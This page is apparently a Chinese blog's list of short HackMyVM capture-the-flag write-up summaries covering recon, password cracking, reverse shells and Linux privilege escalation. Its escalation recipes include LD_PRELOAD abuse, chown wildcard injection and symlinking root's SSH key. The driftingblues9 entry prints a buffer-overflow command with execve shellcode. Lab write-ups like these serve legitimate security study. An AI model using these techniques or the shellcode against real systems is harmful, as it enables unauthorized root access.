- 博客(32)
- 收藏
- 关注
原创 HackMyVM-Warrior
把mac地址修改一下00:00:00:00:00:a0-00:00:00:00:00:af在访问。用loco和Zurviv0r1尝试登录,失败了。再看一看,尝试用bro,成功。
2025-04-09 14:38:17
229
原创 HackMyVM-University
还需要再创建一个项目,用我们刚才创建的用户登录就好,如果创建失败可以手动在靶机创建:mkdir -p /home/sandra/projects/test。/documents.php可以上传文件,fileupload.php未做任何文件类型验证或限制,并且可以看到上传目录studentpic/从文件中找到了一段字符串,试试是不是密码。看一下80端口,一个登录页面。找到了一个git仓库。看看有没有可以利用的。切换sandra成功。
2025-04-08 10:01:52
300
原创 HackMyVM-Preload
什么是 LD_PRELOAD?LD_PRELOAD 是 Linux 下的一个动态链接器特性。它允许用户在程序运行前指定要优先加载的共享库(.so 文件)。如果这个共享库里实现了程序里会调用的函数,它会覆盖系统默认的版本。所以我们可以写一个 .so 文件(共享库),它在加载时执行任意代码,比如提权运行 /bin/bash!默认 sudo 会清除这个变量,env_keep+=LD_PRELOAD,表示系统没有清除它!这就给了我们机会!编写一个恶意共享库,编译。
2025-04-07 12:21:08
354
原创 HackMyVM-Comingsoon
在/index.php下找到一条注释,并且看到cookie不对劲,尝试解密。四个电影名,尝试提权,密码都不对,看大佬说密码是带有数字的动画电影名字。尝试绕过,成功用phar上传,上传以后会自动跳转到上传位置。尝试将cooke后面改为dHJ1ZQ==(true)/etc下有passwd和shadow文件,下载下来。在/var/backups下找到一个压缩包。尝试寻找敏感文件,没找到。寻找一下有没有可以利用的。上传一个反弹shell。合并一下文件,然后爆破。切换到scpuser下。
2025-04-06 16:23:56
567
原创 HackMyVM-Isengard
之前我们找到了一个ring.zip,但没什么用,在寻找一下。目录扫描什么都没扫到,回去看看是不是漏掉了什么。/mellon.php什么都没有,模糊测试。访问一下/ring.zip会自动下载。利用他反弹一个shell。看一下都有什么可以利用的。看一下有没有可以利用的。
2025-04-03 01:45:06
675
原创 HackMyVM-Breakout
cap_dac_read_search=ep 允许程序绕过 DAC,这意味着 tar 可以访问原本 cyber 用户无权访问的文件。通过 tar 读取 /var/backups/.old_pass.bak 获取密码。
2025-04-01 16:22:33
497
原创 HakerMyVM-Stars
把root信息复制到文件里,然后爆破一下。同上一个所说,有三个被替换为了*在cookie里找到了一段编码。看一下有没有可以利用的。
2025-03-31 15:56:11
252
原创 HackMyVM-Drippingblues
想到了index.php和robots.txt中的/etc/dripispowerful.html。提示drip,返回80端口看看有什么关系。使用thugger用户名登录了ssh。上传脚本查看有没有可以利用的地方。找到一个zip文件,下载下来。还有一个压缩包,没跑出来。匿名登录看看21端口。
2025-03-31 14:20:15
479
原创 HackMyVM-Demons
看到还有个key8_8.jpg,根据图片内容和名称生成一个字典。最后知道用户名是一开始找到的那两个图片名称:Aim。看得出是一个密钥,把key保存下来,最后一段也。没发现什么,在扫一下/uryy。把字典和suForce上传一下。/hell,两个图片下载下来。发现有东西,下载下来。把DPB更改为DPX。
2025-03-28 18:18:08
574
原创 HackMyVM-Doubletrouble
1. 目录扫描,发现图片以后处理图片隐写得到账号密码 2. 找到相关漏洞,利用其反弹shell 3. sudo找到可以利用的,提权发现有另一个机器 4. 登陆页面进行sql注入 5. 得到账号密码进行ssh登录 6. 找到内核漏洞,利用其进行提权。
2025-03-27 16:05:44
561
原创 HackMyVM-Warez
将上传的 SSH 公钥文件命名为 authorized_keys 是为了让 SSH 服务器(sshd)自动识别并允许公钥认证登录。在 Linux 系统中,每个用户的 SSH 公钥存储在: ~ / . ssh / authorized_keys当用户尝试使用 SSH 连接到服务器时:客户端提供私钥进行身份验证。服务器检查 ~ / . ssh / authorized_keys 文件,看是否包含相应的公钥。如果匹配,则允许无密码 SSH 登录。
2025-03-26 11:31:59
499
原创 HackMyVM-Doc
pydoc使得本地其他用户可以通过 getfile 接口读取任意文件pydoc -p <port> 启动一个 HTTP 服务器,允许通过 Web 访问 Python 文档。其他用户可以猜测或探测到端口,然后通过 http://localhost:<port>/getfile?key=<filepath> 读取任意文件。这可能导致敏感数据泄露,如 SSH 密钥、配置文件等。
2025-03-25 16:35:02
588
原创 HackMyVM-Bah
主机发现端口扫描漏洞利用看一下80端口目录扫描找到了相关漏洞登录3306mysql看一下有什么都保存下来,尝试一下模糊测试更改一下/etc/hosts文件访问一下尝试使用sql账号密码登场看一下都有什么rocio用户在刚才数据库中有切换到rocio用户成功user.txt看一看有什么可以利用的上传一下linpeas.sh和pspy64写个反弹shell访问http://party.bah.hmv/devel/,反弹成功root.txt
2025-03-24 13:46:16
290
原创 HackMyVM-Hundred
写入新的root密码用户名:密码哈希:最后修改日期:最小间隔:最大间隔:警告天数:禁用天数:账号过期天数:保留字段。
2025-03-21 16:27:06
588
原创 HackMyVM-Noob
web服以较高权限运行,并且该服务默认会扫描或展示当前目录下的文件,攻击者可以通过访问这个软链接来查看或下载原本只有 root 用户才能访问的目录内容。
2025-03-20 16:51:28
465
原创 HackMyVM-Beloved
opt目录可写/bin/sh -c cd /opt && chown root:root *:这意味着 /opt/ 目录下的文件会定期被 root 运行 chown root:root * 命令创建两个文件touch 1由于 chown root:root * 命令中 * 会匹配所有文件,--reference=1 被解释为 chown 的参数,而不是文件名。当 chown root:root * 运行时:* 会匹配 /opt/ 目录下所有文件,包括 1 和 --reference=1。
2025-03-19 14:53:43
653
原创 HackMyVM-Ripper
(catfi 通过 netcat 连接到本地的 10000 端口并将数据保存到 /root/.local/out,比较两个文件的内容:/root/.local/helder.txt 和 /home/helder/passwd.txt,如果两个文件的内容相等,则设置 /usr/bin/ $( cat /root/.local/out) 指定的文件的 SUID 权限,这样该文件在执行时会以 root 权限运行。
2025-03-18 17:07:04
540
原创 HackMyVM-Hidden
模糊测试测试网页是否存在命令执行URL 参数(如?POST 请求参数(如 {"command": "whoami"})HTTP 头(如 User-Agent)文件上传(解析器漏洞)反序列化数据。
2025-03-17 16:04:24
455
原创 HackMyVM-driftingblues9
done:循环10000次./input $(python -c 'print("A" * 171 + "\x10\x0c\x97\xbf" + "\x90"* 1000 + "\x31\xc9\xf7\xe1\x51\xbf\xd0\xd0\x8c\x97\xbe\xd0\x9d\x96\x91\xf7\xd7\xf7\xd6\x57\x56\x89\xe3\xb0\x0b\xcd\x80")'):向input程序传入print("A" * 171):溢出。
2025-03-14 15:03:50
319
原创 HackMyVM-Tron
看大佬写了个脚本来解密,得到:SyWP9j94ZgE9jD。看一下/robots.txt。提权成功,root.txt。没找到哪里可以提权的地方。看一下80端口有什么。目录扫描,没扫到什么。
2025-03-14 12:24:43
451
原创 HackMyVM-driftingblues8
1.目录扫描出字典,用来爆破登录页面的密码2.找到了所使用的系统,并找到相关漏洞3.用linpeas.sh找到了备份文件,从而得到root和clapton用户和密码linpeas.sh一款用于 Linux 系统安全检测和信息收集的脚本工具4.进行爆破得到clapton密码,在其目录又发现一个字典,爆破出root密码。
2025-03-13 17:48:09
368
原创 HackMyVM-visions
ln” 是创建链接的命令,“-s” 表示创建软链接(符号链接)。该指令创建一个从 “/root/.ssh/id_rsa” 文件到当前目录下名为 “.invisible” 的软链接。通过软链接替换掉可以查看的文件,然后切换用户查看到root的私钥。
2025-03-13 13:59:02
337
原创 HackMyVM-Driftingblues7
1.从66端口目录扫描出文件2.base64转为zip文件3.爆破得到zip文件中的账号密码4.登录80端口界面5.找到其相关漏洞6.拿到root。
2025-03-12 16:12:31
247
原创 HackMyVM-T800
calife轻量级sudo替代品,Calife会在登录为另外一个用户前输入自己的密码(如果没有提供登录名,默认是登录为root),在验证具有正确的权限后,就会切换到该用户及其组身份,并就会执行一个shell。如果 calife 是由 root 执行的,不需要密码,会执行一个所需的用户ID的shell。conkyConky 是一个应用于桌面环境的系统监视软件,可以在桌面上监控系统运行状态、网络状态等一系列参数。修改conky.conf配置文件。
2025-03-12 14:16:25
493
原创 HackMyVM-Faust
1.目录扫描发现登录界面2.使用burp进行爆破3.使用cms存在的漏洞获得shell4.根据提示得到paul用户的密码5.paul拥有nico的base32权限,使用其读到nico的密码6.在根目录下找到包含定时执行提示的图片7.根据提示在原本定时执行文件位置改为自己的反弹shell,记得给新建的文件权限。
2025-03-11 20:30:57
313
原创 HackMyVM-Superhuman
得到三个名字:fred\Salome\schopenhauer,保存下来爆破一下。但是知道有一个user.txt和root.txt。看一下/notes-tips.txt。打开什么也没有,但是有一句话。不是图片的,那就试试ssh。也需要密码,爆破一下。看一下压缩包里有什么。
2025-03-11 15:57:56
326
原创 HackMyVM-Driftingblues6
zip2john用于提取 ZIP 压缩包的哈希值,以便可以使用 John the Ripper 等密码破解工具对 ZIP 压缩包密码进行破解。
2025-03-10 13:55:19
235
原创 HackMyVM-Crossroads
enum4linux用于收集SMB服务相关信息,包括共享资源、用户信息、工作组信息等-a:执行所有枚举选项-u:指定用户名-P:指定字典-M:指定要爆破的服务模块用于检测和提取图像文件中隐藏信息。
2025-03-09 14:14:26
358
原创 HackMyVM-Driftingblues5
kdbx文件提权 1 .获取kdbx文件 2 .使用keepass2john工具将 KeePass 数据库文件的密码信息转换为适合密码破解工具处理的哈希值形式 3 .keepass读取keyfile.kdbx文件 4 ./keyfolder目录读取到密钥,就会产生一个包含密码的文件。
2025-03-08 18:13:52
482
原创 HackMyVM-Talk
sqlmap-l:可以指定http请求的文件-p:指定要测试的参数--batch:以批量模式运行 lynx lynx是纯文本模式的网页浏览器,在执行sudo -u root /usr/bin/lynx命令启动lynx后,按下!键。这一操作利用了lynx的特性,使系统以root用户身份执行后续操作,从而实现权限提升,成功获取到root权限,此时用户的uid和gid均为 0 ,代表拥有了系统的最高权限。
2025-03-08 13:39:02
800
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人